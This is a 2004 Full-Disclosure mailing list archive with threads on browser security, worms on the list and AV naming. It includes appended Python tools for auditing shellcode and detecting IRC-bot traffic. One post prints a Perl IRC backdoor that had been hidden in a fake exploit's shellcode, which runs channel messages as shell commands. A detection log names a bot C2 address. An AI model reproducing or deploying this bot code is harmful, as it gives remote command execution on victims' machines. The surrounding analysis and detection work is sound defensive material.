 http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/2100-1032_3-5448719.html?part=dht&tag=ntop&tag=nl.e433
 
 Can anyone say IFRAME? Lol
 
 -Todd
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 
 ---
 Sent via XDAII BlackBerry
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-12 Thread Todd Towles
He can buy a product..or do a super fast rollout of SP2..but why should
he? Microsoft should write better products...period. Every time a Firefox
exploit comes out..there is already a fix...is that magic? No..it is
good coding... 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Rafel Ivgi, The-Insider
 Sent: Friday, November 12, 2004 8:09 AM
 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox
 
 If you do have 14000 machines why don't you buy Finjan's 
 Vital Security For Web?
 It will filter all malicious I.E exploits for all its 
 surfers (it's a proxy, quite fast...)
 
 Or just use SUS(system update server (microsoft)) just like 
 any other administrator... to install sp2 or to just replace 
 the c:\windows\system32\shdocvw.dll with the patched one or 
 with sp2 one...
 
 Rafel Ivgi, The-Insider
 Security Consultant
 Malicious Code Research Center (MCRC)
 Finjan Software LTD
 E-mail: [EMAIL PROTECTED]
 -
 Prevention is the best cure!
 - Original Message -
 From: [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Friday, November 12, 2004 12:46 PM
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
 Oh yeah, I've got 14,000 Windows 2000 machines to update to 
 windows XP SP2,
 hang on, where's that CD?
 
 So thanks for your infinite wisdom there Rafel.
 
 Colin.
 
 
 
 
 
 
 
 
   

 From: Rafel Ivgi, The-Insider [EMAIL PROTECTED]
 Sent by: [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Date: 12/11/2004 06:44
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
 
 That is incorrect, there is a fix -- SP2.
 Users  should use the latest updated system, meaning if there 
 is an SP2,
 they
 should install it.
 
 
 Rafel Ivgi, The-Insider
 Security  Consultant
 Malicious Code Research Center (MCRC)
 Finjan Software  LTD
 E-mail: [EMAIL PROTECTED]
 -
 Prevention  is the best cure!
 - Original Message -
 From: Martin Mkrtchian  [EMAIL PROTECTED]
 To: Todd Towles [EMAIL PROTECTED]
 Cc: Mailing List -  Full-Disclosure 
 [EMAIL PROTECTED];
 [EMAIL PROTECTED]
 Sent: Friday,  November 12, 2004 3:03 AM
 Subject: Re: [Full-Disclosure] IE is just as safe  as FireFox
 
 
  They should've at least released that statement after  they 
 fixed the
  IE FRAME vulnerability. 0 day exploit is in the wild and  no fix for
  it, yet they claim its secure enough.
 
  If the  programmers are as smart as the company press 
 releasers, I can
  see   why I.E. still sux.
 
 
  Martin
 
 
  On Thu, 11 Nov 2004 15:59:20 -0600, Todd Towles
  [EMAIL PROTECTED] wrote:
  Microsoft's security and management product manager (Ben English)
  says...
 
  At a security roundtable discussion in Sydney on Thursday, Ben English,
  Microsoft's security and management product manager, told attendees
  that IE undergoes "rigorous code reviews" and is no less secure than any
  other browser.
 
  "Because IE is ubiquitous, you hear a lot more about it, but I don't
  think that Internet Explorer is any less secure than any other browser
  out there," English said.
 
  http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/2100-1032_3-5448719.html?part=dht&tag=ntop&tag=nl.e433
 
  Can  anyone say IFRAME? Lol
 
  -Todd
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.netsys.com/full-disclosure-charter.html
 
 
 
 
 
 

RE: [Full-Disclosure] dab@heise.de

2004-11-12 Thread Todd Towles
 Expect POC exploits, active internet worms, e-mail trojans, bad words
and off topic messages...expect everything, trust nothing...Welcome to
FD, enjoy your stay =)

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Jeff Donahue
 Sent: Friday, November 12, 2004 9:45 AM
 To: [EMAIL PROTECTED]; Stephen Hunt
 Subject: Re: [Full-Disclosure] [EMAIL PROTECTED]
 
 Obviously this is usual, because the list is unmoderated... 
 Either get a good AV or keep from clicking the executable 
 attachments. ;)
 
 
 - Original Message - 
 From: Stephen Hunt [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Thursday, November 11, 2004 5:35 PM
 Subject: [Full-Disclosure] [EMAIL PROTECTED]
 
 
  Wow, 2nd day on this list and already a windows worm sent to it.
 
  Is this a regular occurrence?
 
  -Steve
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-12 Thread Todd Towles
 

 Use SUS to install XP SP2 to 14,000 Windows 2000 machines? 
 Somehow I think that will be problematic.
Don't forget you have to be on a certain service pack to use SUS for
Windows 2000, then change GPO to push the AU changes to each machine to
even use SUS..and if you have admin access, it isn't totally silent.
Explain that to non-geek users. Since SUS is free, you get what you pay
for...since it over and over again.

 Replace the SHDOCVW.DLL with the XP SP2 version? On Windows 
 2000 machines?
 And what about the practical problems getting round Windows 
 File Protection? On 14,000 machines? Do you want to come in 
 here and try what you suggest?
SP2 breaks stuff..we all forget so fast. Companies have old apps and
some will be broken by SP2, but of course Microsoft will only release
post-SP2 IE fixes..so they tell us to not rush SP2 and then only release
updates for post-SP2. Great...good job. Ohh..and the handling of the GDI
exploit..that was worthy of a billion dollar company.

-Todd

 
 
 
 
 
 
 
 
 
 
   
  
 From: Rafel Ivgi, The-Insider [EMAIL PROTECTED]
 To: [EMAIL PROTECTED], [EMAIL PROTECTED]
 Date: 12/11/2004 14:08
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
 
 
 If you do have 14000 machines why don't you buy Finjan's 
 Vital Security For Web?
 It will filter all malicious I.E exploits for all its 
 surfers (it's a proxy, quite fast...)
 
 Or just use SUS(system update server (microsoft)) just like 
 any other administrator... to install sp2 or to just replace 
 the c:\windows\system32\shdocvw.dll with the patched one or with
 sp2
 one...
 
 Rafel Ivgi, The-Insider
 Security Consultant
 Malicious Code Research Center (MCRC)
 Finjan Software LTD
 E-mail: [EMAIL PROTECTED]
 -
 Prevention is the best cure!
 - Original Message -
 From: [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Friday, November 12, 2004 12:46 PM
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
 Oh yeah, I've got 14,000 Windows 2000 machines to update to 
 windows XP SP2, hang on, where's that CD?
 
 So thanks for your infinite wisdom there Rafel.
 
 Colin.
 
 
 
 
 
 
 
 
 
 From: Rafel Ivgi, The-Insider [EMAIL PROTECTED]
 Sent by: [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Date: 12/11/2004 06:44
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
 
 That is incorrect, there is a fix -- SP2.
 Users  should use the latest updated system, meaning if there 
 is an SP2, they should install it.
 
 
 Rafel Ivgi, The-Insider
 Security  Consultant
 Malicious Code Research Center (MCRC)
 Finjan Software  LTD
 E-mail: [EMAIL PROTECTED]
 -
 Prevention  is the best cure!
 - Original Message -
 From: Martin Mkrtchian  [EMAIL PROTECTED]
 To: Todd Towles [EMAIL PROTECTED]
 Cc: Mailing List -  Full-Disclosure 
 [EMAIL PROTECTED];
 [EMAIL PROTECTED]
 Sent: Friday,  November 12, 2004 3:03 AM
 Subject: Re: [Full-Disclosure] IE is just as safe  as FireFox
 
 
  They should've at least released that statement after  they 
 fixed the 
  IE FRAME vulnerability. 0 day exploit is in the wild and  
 no fix for 
  it, yet they claim its secure enough.
 
  If the  programmers are as smart as the company press 
 releasers, I can
  see   why I.E. still sux.
 
 
  Martin
 
 
  On  Thu, 11 Nov 2004 15:59:20 -0600, Todd Towles 
  [EMAIL PROTECTED] wrote:
   Microsoft's security and management product manager (Ben English)
 says...
 
  At a security roundtable discussion in Sydney on  Thursday, Ben 
  English, Microsoft's security and management product  
 manager, told 
  attendees
 that
  IE undergoes rigorous code

RE: [Full-Disclosure] IE is just as safe as FireFox

2004-11-12 Thread Todd Towles
I don't know about you Rafel, but I know people in your company think XP
SP2 is full of holes also. =)

Ten new security holes in Windows XP Service Pack 2 have been
discovered, so get ready to insert new patches into your patch
management schedule. Microsoft recently announced their Security
Bulletin Advance Notification Program, which gives administrators
several days' advance notice of upcoming patches, however these new
security holes were announced by security product maker Finjan
Software.

http://www.winnetmag.com/Windows/Article/ArticleID/44502/Windows_44502.html

Great, ten more patches they won't release for Windows XP Gold or
Windows 2000.

I think the founder of Finjan is speaking my language as well...

Shlomo Touboul, CEO and Founder of Finjan Software, said Windows XP SP2
operating system is a continuation of the same Windows XP Operating
System and Windows Kernel. All Windows versions have been developed with
requirements for highest backward compatibility and open architecture,
with maximum productivity and ease of use. In addition, Windows
applications typically run with administrative permission with full and
unlimited access to computer resources.

Sound familiar?

-Todd

 Rafel Ivgi, The-Insider
 Security Consultant
 Malicious Code Research Center (MCRC)
 Finjan Software LTD
 E-mail: [EMAIL PROTECTED]
 -
 Prevention is the best cure!
 - Original Message -
 From: [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Friday, November 12, 2004 12:46 PM
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
 Oh yeah, I've got 14,000 Windows 2000 machines to update to 
 windows XP SP2,
 hang on, where's that CD?
 
 So thanks for your infinite wisdom there Rafel.
 
 Colin.
 
 
 
 
 
 
 
 
   

 From: Rafel Ivgi, The-Insider [EMAIL PROTECTED]
 Sent by: [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Date: 12/11/2004 06:44
 Subject: Re: [Full-Disclosure] IE is just as safe as FireFox
 
 
 
 That is incorrect, there is a fix -- SP2.
 Users  should use the latest updated system, meaning if there 
 is an SP2,
 they
 should install it.
 
 
 Rafel Ivgi, The-Insider
 Security  Consultant
 Malicious Code Research Center (MCRC)
 Finjan Software  LTD
 E-mail: [EMAIL PROTECTED]
 -
 Prevention  is the best cure!
 - Original Message -
 From: Martin Mkrtchian  [EMAIL PROTECTED]
 To: Todd Towles [EMAIL PROTECTED]
 Cc: Mailing List -  Full-Disclosure 
 [EMAIL PROTECTED];
 [EMAIL PROTECTED]
 Sent: Friday,  November 12, 2004 3:03 AM
 Subject: Re: [Full-Disclosure] IE is just as safe  as FireFox
 
 
  They should've at least released that statement after  they 
 fixed the
  IE FRAME vulnerability. 0 day exploit is in the wild and  no fix for
  it, yet they claim its secure enough.
 
  If the  programmers are as smart as the company press 
 releasers, I can
  see   why I.E. still sux.
 
 
  Martin
 
 
  On Thu, 11 Nov 2004 15:59:20 -0600, Todd Towles
  [EMAIL PROTECTED] wrote:
  Microsoft's security and management product manager (Ben English)
  says...
 
  At a security roundtable discussion in Sydney on Thursday, Ben English,
  Microsoft's security and management product manager, told attendees
  that IE undergoes "rigorous code reviews" and is no less secure than any
  other browser.
 
  "Because IE is ubiquitous, you hear a lot more about it, but I don't
  think that Internet Explorer is any less secure than any other browser
  out there," English said.
 
  http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/2100-1032_3-5448719.html?part=dht&tag=ntop&tag=nl.e433
 
  Can  anyone say IFRAME? Lol
 
  -Todd
 
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.netsys.com/full-disclosure-charter.html
 
 
 
 
 
 

RE: [Full-Disclosure] Moox firefox/thunderbird builds. Anyone looked at these yet?

2004-11-11 Thread Todd Towles
Subseven had a backdoor in it for years 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Michal Zalewski
 Sent: Thursday, November 11, 2004 9:15 AM
 To: TK-421
 Cc: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Moox firefox/thunderbird 
 builds. Anyone looked at these yet?
 
 On Thu, 11 Nov 2004, TK-421 wrote:
 
  Yes, but because it's open source, you know that thousands 
 of eyes are 
  looking at it daily.  Especially in larger projects like 
  Mozilla/Firefox.
 
 Riight, 220 MB of sources. On a daily basis, just how many 
 people with source code audit experience are desperate enough 
 to download this and look at more than a couple of files?
 
 This does not work as advertised, quite simply; a well placed 
 backdoor is indistinguishable from an unintentional security 
 flaw, and unintentional security flaws can thrive in open 
 source code for years or decades before being spotted.
 
 --
 - bash$ :(){ :|:};: --  Michal 
 Zalewski * [http://lcamtuf.coredump.cx]
 Did you know that clones never use mirrors?
 --- 2004-11-11 16:12 --
 
http://lcamtuf.coredump.cx/photo/current/
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] OT - Re: U.S. 2004 Election Fraud.

2004-11-11 Thread Todd Towles
But please continue your finger pointing and pointless fighting in
private. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of Exibar
 Sent: Thursday, November 11, 2004 9:50 AM
 To: mike lieman; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Re: U.S. 2004 Election Fraud.
 
 
 - Original Message -
 From: mike lieman [EMAIL PROTECTED]
 To: [EMAIL PROTECTED]
 Sent: Thursday, November 11, 2004 9:11 AM
 Subject: [Full-Disclosure] Re: U.S. 2004 Election Fraud.
 
 
  It all boils down to this, without regard for which side you cheer for.
 
  If you can't PROVE your candidate won, with the same certainty that you
  and your bank can PROVE your checking account balance, you might as well
  just stay home and screw the wife.  At least you'll have some fun.
 
  Let me challenge EVERYONE out there...
 
  YOUR VOTE DID NOT COUNT.  And if you contend otherwise, PROVE IT.
 
 Let me challenge YOU.  Prove that my vote did not count.  
 Show me absolute proof, beyond a doubt, that my vote did not count.
 If you cannot prove that my vote did not count, then you STFU.
 
 Exibar
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] IE is just as safe as FireFox

2004-11-11 Thread Todd Towles
Microsoft's security and management product manager (Ben English) says...

 At a security roundtable discussion in Sydney on Thursday, Ben English,
Microsoft's security and management product manager, told attendees that
IE undergoes "rigorous code reviews" and is no less secure than any
other browser. 

"Because IE is ubiquitous, you hear a lot more about it, but I don't
think that Internet Explorer is any less secure than any other browser
out there," English said. 

http://news.com.com/Microsoft+says+Firefox+not+a+threat+to+IE/2100-1032_3-5448719.html?part=dht&tag=ntop&tag=nl.e433

Can anyone say IFRAME? Lol

-Todd

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

2004-11-03 Thread Todd Towles
Who are you to question him about whom he can question? LOL Can't we all
just get along? 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 David Maynor
 Sent: Wednesday, November 03, 2004 2:36 PM
 To: Cryptochrome
 Cc: KF_lists; [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
 
 Who are you to question him.
 
 
 On Wed, 3 Nov 2004 20:31:44 +0100, Cryptochrome 
 [EMAIL PROTECTED] wrote:
   NOW go away!
  
  May I ask: Who are you to tell people to go away?
  
  
  
  
  ___
  Full-Disclosure - We believe in it.
  Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] New Remote Windows Exploit (MS04-029)

2004-11-03 Thread Todd Towles
Yep, Dave pointed that out really fast... 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Barrie Dempster
 Sent: Wednesday, November 03, 2004 3:19 PM
 To: [EMAIL PROTECTED]
 Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029)
 
 
 Excellent exploit, I'm sure no one will spot that perl IRC 
 bot in there, nope no one will see that...
 
 (hint for the readers, try looking at the ASCII output of 
 the char *shellcode_payload= data, looks a little like the 
 following)
 
 [code]
 #!/usr/bin/perl
 $c
 han=#0x;$nick=k
 ;$server=ir3ip.n
 et;$SIG{TERM}={};
 exit if fork;use I
 O::Socket;$sock =
 IO::Socket::INET-
 new($server.:6667
 )||exit;print $so
 ck USER k +i k :k
 v1\nNICK k\n;$i=1
 ;while($sock=~/^
 [^ ]+ ([^ ]+) /){$
 mode=$1;last if $m
 ode==001;if($mod
 e==433){$i++;$ni
 ck=~s/\d*$/$i/;pri
 nt $sock NICK $ni
 ck\n;}}print $soc
 k JOIN $chan\nPRI
 VMSG $chan :Hi\n;
 while($sock){if
 (/^PING (.*)$/){pr
 int $sock PONG $1
 \nJOIN $chan\n;}i
 f(s/^[^ ]+ PRIVMSG
  $chan :$nick[^ :\
 w]*:[^ :\w]* (.*)$
 /$1/){s/\s*$//;$_=
 `$_`;foreach(split
  \n){print $sock
  PRIVMSG $chan :$
 _\n;sleep 1;}}}#/
 tmp/hi
 
 [/code]
 
 --
 Barrie Dempster (zeedo) - Fortiter et Strenue
 
   http://www.bsrf.org.uk
 
 [ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]
 
 
 
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
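The check Barrie describes above, reading the printable bytes out of a published exploit's shellcode buffer before anyone compiles it, as an added Python example that is not part of the original thread. It decodes a C char-array initializer, dumps printable runs the way strings(1) would, and flags script markers that have no business inside machine code. The marker list, the function names and the sample buffer are my assumptions; the sample is constructed from a few harmless fragments and is not the bot from the post.

```python
"""Audit a published exploit's 'shellcode' buffer for embedded readable code.

Added example (not from the original thread). Reproduces the review step
Barrie Dempster describes: dump the printable runs of a char array and look
for script markers before building anything. The sample buffer below is
constructed for illustration and contains only a few marker fragments.
"""
import re
import string

# Printable ASCII as byte values, minus vertical tab and form feed.
PRINTABLE = set(bytes(string.printable, "ascii")) - {0x0B, 0x0C}

# Markers that genuine machine-code shellcode should never contain.
# Hypothetical starting list; extend it for your own review process.
SCRIPT_MARKERS = (
    b"#!/usr/bin/perl", b"#!/bin/sh", b"#!/usr/bin/python",
    b"IO::Socket", b"PRIVMSG", b"NICK ", b"JOIN #", b"fork",
)

# Constructed sample: a little opcode-looking junk with two script
# fragments in the middle, the shape of what the post complains about.
SAMPLE_C = r'''
char *shellcode_payload =
  "\x90\x90\x90\x31\xc0\xc3"
  "#!/usr/bin/perl\n"
  "use IO::Socket;"
  "\x00\xff\xfe";
'''


def parse_c_char_array(src: str) -> bytes:
    """Decode the string literals of a C initializer into raw bytes.

    Assumes the two-digit \\xNN form exploit sources normally use.
    """
    body = "".join(re.findall(r'"((?:\\.|[^"\\])*)"', src))
    simple = {"n": 0x0A, "r": 0x0D, "t": 0x09, "\\": 0x5C, '"': 0x22, "0": 0x00}
    out = bytearray()
    i = 0
    while i < len(body):
        if body[i] == "\\":
            if body[i + 1] == "x":
                out.append(int(body[i + 2:i + 4], 16))
                i += 4
            else:
                out.append(simple[body[i + 1]])
                i += 2
        else:
            out.append(ord(body[i]))
            i += 1
    return bytes(out)


def extract_printable_runs(data: bytes, min_len: int = 4) -> list[str]:
    """Return printable ASCII runs of at least min_len bytes, like strings(1).

    Line breaks end a run so a shebang line comes out on its own.
    """
    runs, current = [], bytearray()
    for b in data:
        if b in PRINTABLE and b not in (0x0A, 0x0D):
            current.append(b)
            continue
        if len(current) >= min_len:
            runs.append(current.decode("ascii"))
        current = bytearray()
    if len(current) >= min_len:
        runs.append(current.decode("ascii"))
    return runs


def find_script_markers(data: bytes) -> list[str]:
    """Return the markers present in the buffer, ordered by first offset."""
    hits = [(data.find(m), m.decode("ascii")) for m in SCRIPT_MARKERS if m in data]
    return [name for _, name in sorted(hits)]


def audit(src: str) -> dict:
    """Decode a C shellcode initializer and report what a human should see."""
    data = parse_c_char_array(src)
    markers = find_script_markers(data)
    verdict = ("SUSPICIOUS: readable script inside 'shellcode'"
               if markers else "no script markers found")
    return {"bytes": len(data), "strings": extract_printable_runs(data),
            "markers": markers, "verdict": verdict}


if __name__ == "__main__":
    for key, value in audit(SAMPLE_C).items():
        print(f"{key}: {value}")
```

Run it against the exploit's own `.c` file rather than the sample and read every string it returns; a payload that is really machine code yields almost nothing printable, so a shebang or an IRC verb in the output is a reason to stop and read the bytes by hand.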


RE: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

2004-10-29 Thread Todd Towles
I read an article about how the site got hacked into...recently. Did
anyone else read this? If it was hacked, then this is a reactive
security measure and not a "we want to keep all non-Americans from
seeing our stuff" one. I would guess it is a security measure, as it is easy
to see mirrors of it outside the country. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Berend-Jan Wever
 Sent: Friday, October 29, 2004 5:47 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Slightly off-topic: www.georgewbush.com
 
 Hi all,
 
 Want to view www.georgewbush.com from outside the US? You 
 can't: Access denied. This security measure (!?) can easily 
 be avoided using a proxy in the US or any anonymous surfing 
 website though.
 
 So, what is it he doesn't want anyone from outside the US to read ?
 
 Cheers,
 SkyLined
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [SPAM] Fw: [Full-Disclosure] Joke.cpl ???

2004-10-29 Thread Todd Towles
We have had this talk on FD before...just search for AV Naming in the
archives...fun stuff. 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Hugo van der Kooij
 Sent: Friday, October 29, 2004 7:54 AM
 To: [EMAIL PROTECTED]
 Subject: Re: [SPAM] Fw: [Full-Disclosure] Joke.cpl ???
 
 On Fri, 29 Oct 2004, Daniel Bachfeld wrote:
 
  So far we have Bagle AQ, AT, AU, AY and BB for the same worm. More 
  proposals?
 
  This is the biggest divergence I've seen the last months. 
 Is there any 
  reason, why the vendors could not agree on one name? We 
 already have 
  CVE-entries and Bugtraq-IDs for vulnerabilities.
 
 So far I noticed at least two distinct files which were 
 detected as W32/[EMAIL PROTECTED] (F-Prot) or Worm.Bagle.AT (ClamAV).
 
 Now I get fresh trash which is decoded as W32/[EMAIL PROTECTED] 
 (F-Prot) or Worm.Bagle.AX (ClamAV).
 
 I am under the impression it is not a single infection.
 
 But I share your sense of utter confusion. To which the 
 people of ClamAV have contributed way too much. (Noticed 
 their 'SomeFool' series?)
 
 Hugo.
 
 -- 
   I hate duplicates. Just reply to the relevant mailinglist.
   [EMAIL PROTECTED]   
 http://hvdkooij.xs4all.nl/
   Don't meddle in the affairs of magicians,
   for they are subtle and quick to anger.
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Gmail Accounts Vulnerable to XSS Exploit

2004-10-29 Thread Todd Towles



Slashdot.org
"A security hole in GMail has 
been found (an XSS vulnerability) which allows access to user accounts without 
authentication. What makes the exploit worse is the fact that changing passwords 
doesn't help. The full details of the exploit haven't been disclosed. The 
vulnerability was reported by Israeli news site Nana. 
They were tipped off by an Israeli hacker. Google has been notified and they are 
working to close the hole. The Register has the story here."





RE: [Full-Disclosure] Re: getting administrator rights on win2003 machine?

2004-10-28 Thread Todd Towles
Requests like that will get you kicked out of other groups. Yet the
request was filled quickly, even without the requester pretending to be a
Security Professional.

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Andrew Poodle
 Sent: Thursday, October 28, 2004 9:40 AM
 To: [EMAIL PROTECTED]
 Subject: RE: [Full-Disclosure] Re: getting administrator 
 rights on win2003 machine?
 
  
  -Original Message-
  From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On 
  Behalf Of Random Letters
  Sent: 28 October 2004 15:17
  To: [EMAIL PROTECTED]
  Subject: [Full-Disclosure] Re: getting administrator rights 
 on win2003
 machine?
  
  snip
 
  This list is for people who try to prevent break-ins - I'll bet that
 no-one here will help you.
 
 While I was going to agree with you.. Someone has already 
 provided help onlist...
 
 Shame really..
 
 I almost laughed at the request..   But was a little surprised to see
 help offered almost immediately
 
 a
 
 I'm at a boarding school in Germany and we have a kind of internet 
 terminal there with win2003 running on the computers. My question is:
 Is there a way of getting administrative privileges? I used an RPC 
 Exploit before but now the computers are patched. How do I get an 
 administrator account now?? I have physical access to the 
 computers.
 
 Greetings
 
 valentin - germany
 
 _
 It's fast, it's easy and it's free. Get MSN Messenger today! 
 http://www.msn.co.uk/messenger
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] RE: Full-Disclosure digest

2004-10-25 Thread Todd Towles
Maybe because they are e-mail borne and if you haven't noticed, you post
on here via e-mail? This list is open, therefore as long as people don't
fix their computers, you will get viruses. Welcome to FD =) 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 digitalchaos
 Sent: Friday, September 03, 2004 4:27 AM
 To: [EMAIL PROTECTED]
 Subject: [Full-Disclosure] RE: Full-Disclosure digest
 
 Why are there viruses being transmitted through this newsgroup??
 
 OUTPUT FROM MCAFEE:
 **   McAfee VirusScan 
 *** Alert generated at: Thu, 02 Sep 2004 13:15:00 -0500 *
 *
 
 McAfee VirusScan has detected a potential threat in this 
 e-mail sent by [EMAIL PROTECTED]
 The following actions were attempted on each suspicious part. 
 We strongly recommend that you report this virus-related 
 activity to [EMAIL PROTECTED]
 
 
  The attachment E-mail body is infected with the 
 W32/[EMAIL PROTECTED] Virus(es). 
 This attachment has been quarantined.
 
 
 This is not the only message I have received like this
 
 Some were infected by NETSKY, various zip/pif virus, and such.
 
 
 
 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 [EMAIL PROTECTED]
 Sent: Friday, October 22, 2004 9:24 AM
 To: [EMAIL PROTECTED]
 Subject: Full-Disclosure digest, Vol 1 #1996 - 8 msgs
 
 
 
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


RE: [Full-Disclosure] Virus/Trojan trying to connect external:445 and 212.175.149.149.6667

2004-10-22 Thread Todd Towles
Sounds like an IRC trojan that is trying to spread via network shares
(maybe weak passwords). 6667 is the IRC port, so it looks like it needs
that for command and control.

Can you get a copy of it? 

 -Original Message-
 From: [EMAIL PROTECTED] 
 [mailto:[EMAIL PROTECTED] On Behalf Of 
 Murat Bicer
 Sent: Friday, October 22, 2004 3:39 AM
 To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
 Subject: [Full-Disclosure] Virus/Trojan trying to connect 
 external:445 and 212.175.149.149.6667
 
 Hi All,
 
 I am seeing some network traffic from some Windows hosts trying 
 to contact random remote hosts on port 445, and these hosts also 
 try to connect to 212.175.149.149.6667
 
 Is this some kind of an IRC bot/trojan?
 
 Anybody aware of it?
 
 We cannot find anything with the virus scanner.
 This virus is very chatty, and keeping the network very busy.
 
 Any suggestions?
 
 Best,
 Murat
 
 

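
The behaviour Murat reports and Todd interprets above (internal hosts fanning out to TCP/445 on random addresses while holding a connection to an IRC port) is easy to pick out of firewall or flow logs once both signals are correlated per source host. The following is an added example written for this archive, not code from anyone in the thread; the log lines are constructed in a generic key=value format (an assumption: your own firewall or NetFlow export can be normalised to src/dst/dport fields), and the C2 address is the one Murat posted.

```python
"""Triage constructed connection logs for the IRC-bot-over-SMB pattern:
many distinct TCP/445 targets from one source plus a connection to an IRC port.
Added example for the Full-Disclosure thread above; not from the original posts."""
import re
from collections import defaultdict

# Constructed sample log (not real traffic). Format is an assumption: one event
# per line with src=, dst= and dport= fields, as many firewalls can export.
SAMPLE_LOG = """\
2004-10-22 03:39:01 src=10.0.0.15 dst=172.16.4.9 dport=445 proto=tcp action=deny
2004-10-22 03:39:01 src=10.0.0.15 dst=198.51.100.23 dport=445 proto=tcp action=deny
2004-10-22 03:39:02 src=10.0.0.15 dst=203.0.113.77 dport=445 proto=tcp action=deny
2004-10-22 03:39:02 src=10.0.0.15 dst=192.0.2.130 dport=445 proto=tcp action=deny
2004-10-22 03:39:03 src=10.0.0.15 dst=198.51.100.8 dport=445 proto=tcp action=deny
2004-10-22 03:39:05 src=10.0.0.15 dst=212.175.149.149 dport=6667 proto=tcp action=allow
2004-10-22 03:40:10 src=10.0.0.21 dst=10.0.0.5 dport=445 proto=tcp action=allow
2004-10-22 03:40:11 src=10.0.0.21 dst=10.0.0.5 dport=445 proto=tcp action=allow
2004-10-22 03:41:00 src=10.0.0.30 dst=198.51.100.40 dport=6667 proto=tcp action=allow
2004-10-22 03:41:30 src=10.0.0.15 dst=198.51.100.9 dport=445 proto=tcp action=deny
"""

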